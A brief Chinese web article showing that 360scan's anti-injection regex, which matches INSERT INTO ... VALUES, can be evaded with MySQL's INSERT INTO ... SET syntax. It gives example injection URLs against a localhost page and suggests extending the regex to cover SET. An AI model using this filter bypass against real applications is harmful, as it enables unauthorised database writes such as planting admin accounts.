Mysql语法绕过360scan insert防注入方法
发布日期:2022-01-28 15:49 | 文章来源:源码之家
360scan正则:INSERT\\s+INTO.+?VALUES
其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =
提交:
http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')
提交set语法:
http://localhost/360.php?sql=insert into user set user='admin',pass='123456'
修复方法当然最好是加上set了。
版权声明:本站文章来源标注为YINGSOO的内容版权均为本站所有,欢迎引用、转载,请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站,禁止在非www.yingsoo.com所属的服务器上建立镜像,否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来,仅供学习参考,不代表本站立场,如有内容涉嫌侵权,请联系alex-e#qq.com处理。
相关文章
关注官方微信